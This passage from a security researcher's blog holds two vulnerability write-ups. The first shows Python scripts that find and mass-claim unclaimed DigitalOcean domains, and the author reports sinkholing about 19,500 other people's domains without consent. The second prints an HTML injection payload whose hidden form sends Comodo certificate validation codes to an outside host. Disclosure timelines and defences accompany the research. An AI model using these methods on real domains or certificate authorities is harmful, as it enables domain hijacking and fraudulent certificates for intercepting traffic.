The above is very important: if I created a zone for thehackerblog.com and you did the same, we’d both get different nameservers. This makes it much harder for anyone to take over my domain if I delete the zone file from my AWS account, because the nameservers are specific to my account. So, if I deleted my domain and you wanted to take it over, you’d have to keep creating zones until you received the same nameserver set as above. Otherwise my domain would be pointed at nameservers other than the ones you control.
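
To see this behavior concretely, here is a rough sketch using Python and the boto3 library (assuming AWS credentials are configured; this is an illustration, not code from the original test). Creating the same zone name repeatedly will generally yield a different delegation set of nameservers each time:

import uuid

import boto3

# Sketch only: assumes boto3 is installed and AWS credentials are configured.
route53 = boto3.client("route53")

# Every hosted zone is assigned a delegation set of four nameservers.
response = route53.create_hosted_zone(
    Name="thehackerblog.com.",
    CallerReference=str(uuid.uuid4()),  # must be unique for every request
)

print(response["DelegationSet"]["NameServers"])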

Back to DigitalOcean

Returning to DigitalOcean, the answer to the question “what happens when I delete my domain from DigitalOcean but forget to change the nameservers?” becomes clear. If you delete the domain from your account anyone can immediately re-add it to their own account without any verification of ownership and take it over.

It’s one thing to notice a possible issue; proving that it occurs at a large scale is another beast entirely. How can we find out if this issue is systematic and common without attempting to add every domain on the Internet to our DigitalOcean account? How would we even get a list of every domain name anyway?

To start, one notable way to tell whether a domain has been added to a DigitalOcean account is to perform a regular DNS query and see how the DigitalOcean nameservers respond. As an example, we’ll use alert.cm, which has its nameservers set to DigitalOcean but is not listed under any DigitalOcean account:

mandatory@Matthews-MacBook-Pro-4 ~> dig NS alert.cm @ns1.digitalocean.com.

; <<>> DiG 9.8.3-P1 <<>> NS alert.cm @ns1.digitalocean.com.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 53736
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;alert.cm.            IN    NS

;; Query time: 51 msec
;; SERVER: 173.245.58.51#53(173.245.58.51)
;; WHEN: Tue Aug 23 23:09:00 2016
;; MSG SIZE  rcvd: 26

As can be seen in the above dig output, the DigitalOcean nameservers returned a DNS REFUSED (RCode 5) error which indicates that the nameservers refused to respond to the NS record query we performed. This gives us an easy and lightweight way to differentiate between domains that are currently listed under a DigitalOcean account and domains that aren’t.
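
To give a rough idea of how this check can be automated, here is a minimal sketch using Python and the dnspython library (this is an illustration under my own assumptions, not the exact script used for the scan):

import dns.message
import dns.query
import dns.rcode
import dns.resolver

# Sketch only: requires the dnspython library. Resolve one of DigitalOcean's
# nameservers to an IP address that we can query directly.
DO_NS_IP = dns.resolver.resolve("ns1.digitalocean.com", "A")[0].address

def is_unclaimed(domain):
    # A REFUSED response code means the domain is not listed under any
    # DigitalOcean account (and could therefore be added by anyone).
    query = dns.message.make_query(domain, "NS")
    response = dns.query.udp(query, DO_NS_IP, timeout=5)
    return response.rcode() == dns.rcode.REFUSED

print(is_unclaimed("alert.cm"))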

This solves one part of the problem, but checking every domain on the Internet this way is still very intensive. Additionally, how can we get a list of every domain name on the Internet? The answer is to get a copy of the zone files for various top-level domains (TLDs). To start we’ll use the zone files for the .com and .net TLDs, because they can be obtained from Verisign for research purposes. The zone files contain every .com and .net domain in existence and their corresponding nameservers. By grepping through these zone files we can figure out exactly how many .com and .net domain names use DigitalOcean for DNS hosting. At the time of this writing, the counts for both TLDs are the following:

  • .com: 170,829
  • .net: 17,101

Combined, this is a total of 187,930 domain names that have DigitalOcean as their DNS provider. We can now query all of these domains and check for DNS REFUSED errors to see whether they are not listed under a DigitalOcean account (and are thus able to be taken over). After a short Python script and a few hours of DNS querying we are able to enumerate all of the vulnerable domains (at least in the two TLDs previously mentioned). The final count comes out to 21,598 domains that returned a DNS REFUSED error upon querying them. After adding these domains to my DigitalOcean account via their API, the real number turned out to be closer to ~19,500 domains (as it appears the DNS method was not 100% accurate). For every domain added to my account, a single DNS A record for the base domain was created, pointing at an EC2 instance. This was done in hopes of understanding why so many domains ended up in this state, and the results were quite surprising.
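
For reference, adding a domain through DigitalOcean’s v2 API looks roughly like the following sketch (Python with the requests library; the API token and sinkhole IP are placeholders, and this is not necessarily the exact code used):

import requests

API_TOKEN = "DIGITALOCEAN_API_TOKEN"  # placeholder, not a real token
SINKHOLE_IP = "203.0.113.10"          # placeholder for the sinkhole server's IP

def add_domain(domain):
    # POSTing to /v2/domains registers the domain under the account and
    # points the bare domain at ip_address.
    response = requests.post(
        "https://api.digitalocean.com/v2/domains",
        headers={"Authorization": "Bearer " + API_TOKEN},
        json={"name": domain, "ip_address": SINKHOLE_IP},
    )
    return response.status_code == 201

add_domain("alert.cm")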

The Sinkholed Traffic

While I expected that most of the domains would be purely spam/junk domains that had not yet been configured (perhaps all belonging to a single domain reseller, for example), this was not the case. The sinkhole server was just a standard nginx web server returning a blank webpage and logging web requests. After having the server up for just a few days, the access logs had grown to 1.8GB in size, with a constant stream of requests pouring in. Most of these were, unsurprisingly, from search engines eager to crawl the web as quickly as possible (~80% of the traffic was from spiders); the rest were legitimate users navigating to the now-redirected websites.

DigitalOcean’s Response

After sinkholing the domains and proving that the theory was in fact true, I reached out to DigitalOcean’s security team describing the issue (using PGP as specified by their security page). Their response was the following:

Matthew,

Thank you for sending this in. This is a known workflow within our platform. We are committed to always improving our customer’s experience and have been examining ways of minimizing the type of behavior you are describing.

Regards,

Nick

Nicolas [REDACTED] [email protected]

So essentially they’re aware and may be looking for ways to mitigate this behaviour in the future, but they don’t appear to have any immediate plans.

Additionally, my DigitalOcean account had been locked. This prevented me from taking the next logical step: changing all of the DNS records to point to 127.0.0.1, effectively neutering the traffic. When I asked support why my account had been locked (though I had some idea), I received the following response:

There has been a response to your ticket:

Hi there,

We have reviewed your account, and we are not able to provide further service.

I understand this may be inconveniencing, but we are not going to be able to provide you hosting services.

This is a final decision and is not subject to change.

Regards,

Cash [REDACTED] Trust & Safety Specialist

Digital Ocean Support

So no reasoning was given for the ban, and there would be no further support. This leaves me in the uncomfortable position of being stuck with all the traffic I’ve been sinkholing. Since I can’t access my account to change the domains’ DNS, I’m stuck receiving thousands of requests a minute from various sites. I can’t tear down the EC2 sinkhole server because the Elastic IP may be re-allocated to someone more malicious, so I have to pay to keep it up (for how long, I’m not sure). While I’ve stopped all services on the server to protect the privacy of the users accidentally hitting these sites, and have srm-ed the access logs, I am unable to stop the flood of traffic going forward. Being in this awkward position, I reached out to DigitalOcean’s team to see if they could assist in deleting the domains from my account (sadly leaving them vulnerable again) or sinkholing the DNS to 127.0.0.1. I received a very helpful response from someone on the security team and it appears they will look into it.

In Review

This provides some interesting insight into why the pattern of using unique nameservers for importing domain names is so common (it prevents exactly this issue). It’s worth noting that any system which uses non-unique nameservers for domain name importing is likely vulnerable to this exact same type of attack (what about registrars? domain parking services?). Further research into this area is likely to yield similar results.

Until next time,

-mandatory

Proofread by udanquu

I recently decided to investigate the security of various certificate authorities’ online certificate issuing systems. These online issuers allow people to prove to a certificate authority that they own a specific domain, such as thehackerblog.com, and get a signed certificate so they can enable SSL/TLS on that domain. Each online certificate issuing system has its own process for validating domains and issuing certificates, which leaves a lot of attack surface for malicious entities.

A Summary On Certificate Authorities & SSL/TLS

For those unfamiliar with the current certificate authority (CA) system used on the web, I’d recommend watching Moxie Marlinspike’s talk on SSL and the Future of Authenticity for an in-depth look. This also happens to be one of my favorite talks and Moxie is a great speaker, so I highly recommend it (bonus points: he also talks about Comodo specifically). For those who don’t want to watch the talk, I’ll write a short summary here.

The SSL/TLS system, which encrypts communications in modern web browsers, works by your browser trusting a list of built-in certificate authorities. Whenever your browser attempts to connect to a site over SSL/TLS, it will retrieve the site’s certificate and check whether it chains up to one of these built-in authorities. These authorities are allowed to mint intermediate certificate authorities which can mint SSL/TLS certificates for arbitrary websites. This creates tall trees of trust where one certificate mints another certificate, which finally mints a certificate for a website like example.com. For a good visual of the certificate authority trees of trust, click here.

This entire system was designed to prevent man-in-the-middle attacks which attempt to snoop on a victim’s traffic. When SSL/TLS is implemented properly, an attacker would have to present a valid certificate which has been signed by one of the trusted (intermediate) certificate authorities. If an attacker did have access to a valid signed certificate for a site, it would allow him or her to intercept all traffic to that site while the browser still shows the “secure lock” in the URL bar saying everything is fine. Suffice it to say, ensuring that the online systems which allow people to obtain signed certificates are secure is very important. If ANY of the existing online certificate issuing systems is compromised, the entire system is essentially bypassed.
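
To make the trust check concrete, here is a minimal Python sketch of what a TLS client conceptually does: open a connection, let the library validate the presented certificate chain against the trusted CA store, and inspect who issued the leaf certificate (example.com is just a stand-in):

import socket
import ssl

# Sketch only: validate a site's certificate chain against the default
# trusted CA store, conceptually what a browser does on every HTTPS visit.
hostname = "example.com"
context = ssl.create_default_context()  # loads the trusted root CAs

with socket.create_connection((hostname, 443)) as sock:
    with context.wrap_socket(sock, server_hostname=hostname) as tls:
        # The handshake only succeeds if the presented chain ends at a
        # trusted root and the certificate matches the hostname.
        cert = tls.getpeercert()
        print("Issued by:", dict(pair[0] for pair in cert["issuer"]))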

Hunting for Vulnerable Issuers

When I started out hunting for possible vulnerabilities, my initial strategy was to look for the cheapest, most 90’s-looking, poorly designed certificate authority websites. Since the compromise of any certificate authority allows an attacker to bypass all the protections of SSL/TLS, it doesn’t even have to be a popular provider; they all have the same power. After doing a bit of searching I realized it would be advantageous to test authorities that offered free SSL certificates, since doing tests against these wouldn’t cost me any money. I passed on Let’s Encrypt because I figured it had already been thoroughly audited; the second site I saw was a 30-day free trial from PositiveSSL (a Comodo brand). This seemed like as good a target as any, so I went through their online process for issuing a free 30-day trial certificate for my website thehackerblog.com.

Comodo’s 30-Day PositiveSSL Certificate Online Issuer

The following is a screenshot of the PositiveSSL website, advertising the free 30-day trial:

1-free-ssl-page

The process starts by asking the interested user for a certificate signing request (CSR). This can easily be generated using OpenSSL via the command line:

openssl req -new -newkey rsa:2048 -nodes -keyout yourdomain.com.key -out yourdomain.com.csr

Once you have your CSR, you then have to paste it into the web application:

2-csr-request

Upon entering your CSR and selecting the software you used to generate it, you then select the email address to use for domain validation (pulled from the website’s WHOIS) and arrive at a “Corporate Details” page. This is the vulnerable portion of the application, where you fill out your company/personal information before getting to the email validation step:

4-corporate-details

When I first went through this process I mindlessly filled junk HTML into all of these fields. The service then sent a verification email to the email address listed in the website’s WHOIS info. Once I received the email, I noticed the HTML was not being properly escaped and the markup I had entered earlier was being evaluated. This is really bad, because the email also contained a verification code which could be used to obtain an SSL/TLS certificate for my website. This means that if I had a way to leak a victim’s token, I could obtain a valid certificate for their site and seamlessly intercept traffic to it without users ever knowing.

Dangling Markup Injection in Confirmation Emails

Since almost no email clients support JavaScript, a classic XSS payload won’t execute in an email; instead we have to abuse plain HTML (dangling markup) to leak the email’s contents. Let’s take a look at the raw verification email that Comodo sends:

Delivered-To: mandatory@[REDACTED]
...trimmed for brevity...
From: "Comodo Security Services" <noreply_support@comodo.com>
To: "mandatory@[REDACTED]" <mandatory@[REDACTED]>
Date: Sun, 05 Jun 2016 00:21:23 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="(AlternativeBoundary)"
Message-ID: <douEzQt+Ql/CywdHoZA/kg@mcmail1.mcr.colo.comodo.net>
...trimmed for brevity...
--(AlternativeBoundary)
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 8bit

<html>
<head>
  <style type=text/css>
  <!--
    body { font-family: Arial, Helvetica, sans-serif; font-size: 10pt }
    p { font-family: Arial, Helvetica, sans-serif; font-size: 10pt }
    pre { font-family: Arial, Helvetica, sans-serif; font-size: 10pt }
    pre.validate { font-family: Arial, Helvetica, sans-serif; font-size:11pt; color:#007A00; font-weight: bold;}
    pre.reject { font-family: Arial, Helvetica, sans-serif; font-size:7pt; color:#FF0000; font-weight: bold;}
    td { font-family: Arial, Helvetica, sans-serif; font-size: 10pt }
    .p8 { font-family: Arial, Helvetica, sans-serif; font-size: 8pt; font-weight: normal }
    .p4 { font-family: Arial, Helvetica, sans-serif; font-size: 10pt; color: #006699; font-weight: bold }
    A:link    { font-family: Arial; color: #000066; font-weight: bold; text-decoration: underline }
    A:visited { font-family: Arial; color: #000066; font-weight: bold; text-decoration: underline }
    A:active  { font-family: Arial; color: #000066; font-weight: bold; text-decoration: underline }
    A:hover   { font-family: Arial; color: #003399; font-weight: bold; text-decoration: underline }
    .title { font-family: Arial, Helvetica, sans-serif; font-size: 11pt; font-weight: bold; color: #003399 }
    -->
  </style>
</head>
<body bgcolor=#CCCCCC text=#000000 leftmargin=4 topmargin=5>
<table width=780 border=0 cellspacing=0 cellpadding=1 align=left>
  <tr><td align=left><img border="0" src="http://secure.comodo.net/images/banners/logo_comodo.png"></td></tr>
  <tr>
    <td bgcolor=#000000>
      <table width=780 border=0 cellspacing=0 cellpadding=3 align=left>
        <tr>
          <td bgcolor=#FFFFFF>
            <br><font size=2 class=title>Domain Control Validation for:[REDACTED]</font>
          </td>
        </tr>
        <tr>
          <td bgcolor=#FFFFFF colspan=2>
            <p><br>Dear mandatory@[REDACTED],</p>
            <pre>
We have received a request to issue an SSL certificate for:
Domain: [REDACTED]
Subject: 
             <h1>Injection Test</h1>
<br>This order was placed by <h1>Injection Test</h1><h1>Injection Test</h1> whose phone number is 1231231234 and whose email address is mandatory@[REDACTED]</pre>
            <pre class="validate">
<b>To permit the issuance of the certificate please browse <a href="https://secure.comodo.net/products/EnterDCVCode?orderNumber=21757254"><font color=#007A00>here</font></a>
and enter the following "validation code":</b></pre>
            <pre class="validate" style="text-align:center;"><b>Z7R58i[REDACTED]</b></pre>
            <pre class="reject"><br><br><br><br>
**************PLEASE NOTE CHOOSING THE OPTION BELOW WILL REJECT THE CERTIFICATE**************
...trimmed for brevity...

Peeking at the above raw email, we notice that the HTML is not being properly escaped. Additionally, Comodo makes use of a static MIME boundary of (AlternativeBoundary), which is dangerous because it allows us to inject arbitrary sections into the email that Comodo sends for domain validation. We’ll ignore the boundary issue and focus on the HTML injection. As it turns out, the Company Name field we saw previously is not length-limited, which allows us to inject arbitrary HTML into the final email. We will take advantage of this by setting our Company Name to the following:

<b><u>You have 24 hours to reject this request.</u></b></pre>
<form action="http://example.com/"><button type="submit">Click here to reject this request.</button><textarea style="width: 0px; max-height: 0px;" name="l">

The above HTML redresses the email and starts an unclosed <textarea> block which “swallows” the rest of the email’s HTML, together with a submit button and a form pointing at my website. The following is a screenshot of the email sent to me by Comodo:

7-comodo_email_ssl

As can be seen in the above screenshot, the final email has been redressed to state that the user has 24 hours to reject a pending SSL/TLS certificate request. Unknown to the victim, however, clicking the button actually leaks the verification code to my own site via the <form> submission. Basically, any site owner that receives this email is one click away from allowing an attacker to issue a certificate for their site. This is a basic redress example; since you have arbitrary HTML, you could make the entire thing much more convincing. Form submissions are a great way to leak secrets like this because they work in many different mail clients. Even the iPhone’s Mail app supports this functionality:

redacted_iphone_email

Once I’ve leaked the code from the victim in this way, I can then log into the account I created during the certificate request process and download the SSL/TLS certificate. The following is a screenshot of what this looks like:

10-download-certificate

In a real-world attack scenario, a malicious actor could request certificates for popular websites such as Facebook.com, Google.com, etc., causing these poisoned validation emails to be sent to their administrators, in order to snoop on the traffic of their victims. Since the email passes SPF checks and is legitimately from Comodo, a system administrator would have no reason to believe it is not completely authentic.

Comodo Resellers

One other important thing to note is that resellers of Comodo’s certificates were also affected. The risk is amplified for them because resellers can have a customized HTML header and footer for the verification emails that get sent out. This means it would be possible for a third-party vendor to have a dangling <img> tag in the header combined with a single quote in the footer, which would side-channel leak the verification code in the email body (similar to the attack above, but automatic, with no user interaction). This style of dangling markup injection wasn’t possible in the previous proof-of-concept but is possible for resellers. I was not able to build a proof-of-concept for this, however, because I didn’t want to probe further into their reseller system after reporting the initial vulnerability.

Disclosure Timeline

  • June 4th, 2016 – Emailed [email protected] and reached out on Twitter to @Comodo_SSL.
  • June 6th, 2016 – Robin from Comodo confirms this is the correct contact to report security issues, provides PGP key.
  • June 6th, 2016 – Emailed Comodo the vulnerability PGP-encrypted and sent my PGP public key.
  • June 7th, 2016 – Robin from Comodo confirms they understand the bug and state they will work on a fix as soon as possible.
  • June 20th, 2016 – Emailed Comodo for status update.
  • July 1st, 2016 – Outlined the timeline for the responsible disclosure date (90 days from the report date, per industry standards).
  • July 25th, 2016 – Robin from Comodo confirms a fix has been put in place.

Final Thoughts

Normally, the name of the game when it comes to finding a way to mint arbitrary SSL/TLS certificates is to find the smallest, cheapest, and oldest certificate provider you can. Comodo is the exact opposite of this: they have a 40.6% market share and are the largest minter of certificates on the Internet. Basically, they are the largest provider of SSL/TLS certificates and yet they still suffer from security issues which would (hopefully) be caught in a regular penetration testing engagement. This paints a grim picture for the certificate authority system. If the top providers can’t secure their systems, how could the smaller providers possibly be expected to do so? It’s a hard game to play since the odds are heavily stacked in the attacker’s favor: there are tons of certificate authorities, all with the power to mint arbitrary certificates. A single CA compromise and the entire system falls apart.

Luckily, we have some defences against this with newer web technologies such as Public Key Pinning (HPKP), which offers protection against attackers using forged certificates. The following is a quote from MDN about the functionality:

“To ensure the authenticity of a server’s public key used in TLS sessions, this public key is wrapped into a X.509 certificate which is usually signed by a certificate authority (CA). Web clients such as browsers trust a lot of these CAs, which can all create certificates for arbitrary domain names. If an attacker is able to compromise a single CA, they can perform MITM attacks on various TLS connections. HPKP can circumvent this threat for the HTTPS protocol by telling the client which public key belongs to a certain web server.”

https://developer.mozilla.org/en-US/docs/Web/Security/Public_Key_Pinning
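
For reference, HPKP is deployed by sending a response header roughly like the following (the pin values below are placeholders for base64-encoded SHA-256 hashes of the pinned public keys; a backup pin is required alongside the primary):

Public-Key-Pins: pin-sha256="<primary-key-hash>"; pin-sha256="<backup-key-hash>"; max-age=5184000; includeSubDomains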

This is a fairly powerful mitigation against an attacker with a forged certificate. However, support is spotty, with no support in Internet Explorer, Edge, Safari, or Safari on iOS.

As for alternatives to the CA system, a few ideas have been presented but none have widespread support. One example is Convergence, which was presented by Moxie in the talk mentioned earlier in this post. However, it is only supported in Firefox and I’ve personally never heard of people using it.

Many people like to speak of a certificate authority hack as if it were something only a nation state could accomplish, but just a day’s worth of searching led me to this issue, and I don’t doubt that many providers suffer from much more severe vulnerabilities. What happens when your attacker doesn’t care about ethical boundaries and is willing to do much more in-depth testing? After all, this is Comodo, the largest provider. What about the smaller certificate providers? Do they really stand a chance?

Until next time,

-mandatory